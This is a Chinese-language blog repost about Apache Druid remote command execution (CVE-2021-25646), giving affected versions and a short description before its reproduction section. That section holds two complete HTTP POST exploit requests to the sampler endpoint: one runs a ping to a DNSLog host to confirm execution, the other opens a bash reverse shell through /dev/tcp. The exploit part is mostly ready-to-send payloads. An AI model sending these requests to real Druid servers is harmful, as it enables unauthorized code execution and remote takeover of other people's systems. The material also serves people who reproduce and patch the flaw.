druid 远程命令执行(CVE-2021-25646)

Posted ying-hack

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了druid 远程命令执行(CVE-2021-25646)相关的知识,希望对你有一定的参考价值。

druid 远程命令执行

druid 介绍

Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端

影响版本

Apache Druid < 0.20.1

漏洞简介

Apache Druid包括执行用户提供的javascript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。

漏洞复现

  1. DNSLog

    POST /druid/indexer/v1/sampler HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json
    Content-Length: 679
    Connection: close
    
    
        "type": "index",
        "spec": 
            "type": "index",
            "ioConfig": 
                "type": "index",
                "firehose": 
                    "type": "local",
                    "baseDir": "quickstart/tutorial/",
                    "filter": "wikiticker-2015-09-12-sampled.json.gz"
                
            ,
            "dataSchema": 
                "dataSource": "sample",
                "parser": 
                    "type": "string",
                    "parseSpec": 
                        "format": "json",
                        "timestampSpec": 
                            "column": "time",
                            "format": "iso"
                        ,
                        "dimensionsSpec": 
                    
                ,
                "transformSpec": 
                    "transforms": [],
                    "filter": 
                        "type": "javascript",
                        "function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')",
                        "dimension": "added",
                        "": 
                            "enabled": "true"
                        
                    
                
            
        ,
        "samplerConfig": 
            "numRows": 500,
            "timeoutMs": 15000,
            "cacheKey": "4ddb48fdbad7406084e37a1b80100214"
        
    
    
    
  2. 反弹shell

    POST /druid/indexer/v1/sampler HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json
    Content-Length: 679
    Connection: close
    
    
    	"type": "index",
    	"spec": 
    		"type": "index",
    		"ioConfig": 
    			"type": "index",
    			"firehose": 
    				"type": "local",
    				"baseDir": "quickstart/tutorial/",
    				"filter": "wikiticker-2015-09-12-sampled.json.gz"
    			
    		,
    		"dataSchema": 
    			"dataSource": "sample",
    			"parser": 
    				"type": "string",
    				"parseSpec": 
    					"format": "json",
    					"timestampSpec": 
    						"column": "time",
    						"format": "iso"
    					,
    					"dimensionsSpec": 
    				
    			,
    			"transformSpec": 
    				"transforms": [],
    				"filter": 
    					"type": "javascript",
    					"function": "function(value)return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')",
    					"dimension": "added",
    					"": 
    						"enabled": "true"
    					
    				
    			
    		
    	,
    	"samplerConfig": 
    		"numRows": 500,
    		"timeoutMs": 15000,
    		"cacheKey": "4ddb48fdbad7406084e37a1b80100214"
    	
    
    

返回的状态码为200则为成功。

该漏洞是在认证完之后才可以复现的!!!

以上是关于druid 远程命令执行(CVE-2021-25646)的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2021-25646Apache Druid 远程代码执行漏洞复现

Apache druid未授权命令执行漏洞复现

Druid数据库密码加密

Druid连接远程ORACLE出现Rest 连接超时等问题

Druid使用ConfigFilter

mybatis+Druid连接池的问题